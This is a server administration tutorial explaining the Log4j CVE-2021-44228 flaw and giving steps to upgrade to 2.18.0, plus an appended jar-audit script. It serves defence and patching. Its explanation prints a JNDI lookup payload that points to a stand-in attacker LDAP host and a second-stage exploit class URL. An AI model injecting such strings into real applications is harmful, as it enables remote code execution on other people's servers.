If you are using Log4j on your Ubuntu or CentOS server, you are required to upgrade to the latest version 2.18.0 or later to avoid any risk of attack.
What is Log4j?
Apache Log4j is a Java-based logging platform for analyzing web servers and individual application log files.
While not included by default in a standard Apache LAMP stack, the software is widely used in businesses, eCommerce platforms, and games such as Minecraft, whose developers were quick to issue a patch.
Log4j exploits entail passing a string containing the substitution “${jndi:ldap://attacker.com/a}”, after which Log4j2 sends an LDAP request to the attacker's website for the path to the Java class. By returning a path to their server, attackers can gain access to the operating system.
For example, using a specially crafted Java class, e.g. http://second-stage.example.com/Exploit.class, the Log4j exploit can be loaded and executed with the current application’s rights, allowing remote code execution. The vulnerability has been identified as CVE-2021-44228.
While Apache quickly released Log4j 2.15.0 with a fix for the vulnerability, many businesses have yet to update and remain exposed to an attack that is described as being very simple to implement.
Is Log4j 1.x vulnerable?
Given the severity of the current Log4j vulnerability, it would be prudent to exercise an abundance of caution and assume that all versions prior to 2.15 are potentially vulnerable and should be patched or updated.
According to Apache, “Log4j 1.x has reached the end of life and is no longer supported. Vulnerabilities reported after August 2015 against Log4j 1.x were not checked and will not be fixed. Users should upgrade to Log4j 2 to obtain security fixes.”
How To Fix Log4j vulnerability
If you are using Log4j on your Ubuntu server you are required to upgrade to the latest version 2.18.0 or later to avoid any risk of attack. Set the log4j2.formatMsgNoLookups system property to true or remove the JndiLookup class from the “classpath” in version 2.10 and later.
How To Update Log4j In Ubuntu/CentOS
The Log4j package is distributed under the Apache Software License, a full-fledged open-source license certified by the Open Source Initiative.
The most recent log4j version, complete with source code, class files, and documentation, is available here.
To update log4j on your system, download the latest apache-log4j-x.x.x.tar.gz from the specified URL and follow the steps given below.
Step 1: Download and unzip
Download and unzip/untar the downloaded file as follows (The latest version at the time is apache-log4j-2.18.0):
code:
~# wget https://dlcdn.apache.org/logging/log4j/2.18.0/apache-log4j-2.18.0-bin.tar.gz
~# gunzip apache-log4j-2.18.0-bin.tar.gz
~# tar -xvf apache-log4j-2.18.0-bin.tar
apache-log4j-2.18.0-bin/RELEASE-NOTES.md
apache-log4j-2.18.0-bin/LICENSE.txt
apache-log4j-2.18.0-bin/NOTICE.txt
apache-log4j-2.18.0-bin/log4j-api-2.18.0.jar
apache-log4j-2.18.0-bin/log4j-api-2.18.0-sources.jar
apache-log4j-2.18.0-bin/log4j-api-2.18.0-javadoc.jar
apache-log4j-2.18.0-bin/log4j-core-2.18.0.jar
.......................................
Untarring creates a directory hierarchy named apache-log4j-x.x.x.
Step 2: Optional
This step is optional and is dependent on the features of the log4j framework that you intend to use. If you already have the following packages installed on your machine, you are good to go; otherwise, you will need to install them in order for log4j to work.
JavaMail API: Log4j’s email-based logging requires the Java Mail API (mail.jar) to be installed on your machine.
JavaBeans Activation Framework: The Java Mail API will also require that you install the JavaBeans Activation Framework (activation.jar).
Java Message Service: Log4j’s JMS-compatible features will require you to install both JMS and the Java Naming and Directory Interface (JNDI).
XML Parser: Log4j requires a JAXP-compatible XML parser. Make sure you have Xerces.jar installed on your machine.
Step 3: Locate installed Log4j jar files
Locate all Log4j jar files in your environment to find the current installation directory of Log4j.
code:
:~# find / -type f -name 'log4*'
/usr/local/apache-log4j-2.3.2-bin/log4j-taglib-2.3.2-sources.jar
/usr/local/apache-log4j-2.3.2-bin/log4j-flume-ng-2.3.2.jar
/usr/local/apache-log4j-2.3.2-bin/log4j-1.2-api-2.3.2.jar
/usr/local/apache-log4j-2.3.2-bin/log4j-iostreams-2.3.2.jar
/usr/local/apache-log4j-2.3.2-bin/log4j-core-2.3.2.jar
....................
Looking at the output, we have log4j-core-2.3.2.jar and other jar files. The most important one is the core jar.
Step 4: Replace old log4j files
Replace all the necessary files depending on your environment setup
code:
:~# cd apache-log4j-2.18.0-bin
:~/apache-log4j-2.18.0-bin# ls | grep core
log4j-core-2.18.0.jar
log4j-core-2.18.0-javadoc.jar
log4j-core-2.18.0-sources.jar
log4j-core-2.18.0-tests.jar
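To check that Steps 3 and 4 left no old copy behind, the script below (an added example, not part of the original article) lists every log4j-core jar under a directory, compares its version with 2.18.0, and for older jars reports whether the JndiLookup class is still packaged. It assumes jars keep their upstream log4j-core-<version>.jar names; the function names and script name are illustrative, and jars nested inside WAR or fat-jar archives are not inspected.

```shell
#!/bin/sh
# Added example: audit log4j-core jars after an upgrade. Names are illustrative.
TARGET="2.18.0"   # version the article upgrades to
JNDI_CLASS="org/apache/logging/log4j/core/lookup/JndiLookup.class"

# version_lt A B: succeed when dotted version A is lower than B.
# Components compare numerically, so 2.3.2 sorts below 2.18.0.
version_lt() {
    a=$1; b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*}; y=${b%%.*}
        if [ "$a" = "$x" ]; then a=""; else a=${a#*.}; fi
        if [ "$b" = "$y" ]; then b=""; else b=${b#*.}; fi
        x=${x%%[!0-9]*}; y=${y%%[!0-9]*}   # "0-beta9" -> "0"
        x=${x:-0}; y=${y:-0}
        if [ "$x" -lt "$y" ]; then return 0; fi
        if [ "$x" -gt "$y" ]; then return 1; fi
    done
    return 1   # equal versions are not "lower"
}

# audit_jar FILE: print "STATUS<TAB>VERSION<TAB>FILE" for one jar.
audit_jar() {
    base=${1##*/}
    ver=${base#log4j-core-}; ver=${ver%.jar}
    if version_lt "$ver" "$TARGET"; then
        # Zip entry names are stored uncompressed, so a byte search shows
        # whether the JndiLookup class is still packaged in this jar.
        if grep -qF "$JNDI_CLASS" "$1"; then status=OUTDATED
        else status=OUTDATED-NO-JNDILOOKUP; fi
    else
        status=OK
    fi
    printf '%s\t%s\t%s\n' "$status" "$ver" "$1"
}

# audit_tree DIR: audit every log4j-core runtime jar below DIR.
audit_tree() {
    find "$1" -type f -name 'log4j-core-[0-9]*.jar' \
        ! -name '*-sources.jar' ! -name '*-javadoc.jar' ! -name '*-tests.jar' |
    sort | while IFS= read -r jar; do audit_jar "$jar"; done
}

# Usage: sh audit-log4j.sh /usr/local   (script name is hypothetical)
if [ "$#" -gt 0 ]; then audit_tree "$1"; fi
```

Any line that does not start with OK points at a jar that still needs replacing; applications that loaded the old jar must be restarted before the new one takes effect.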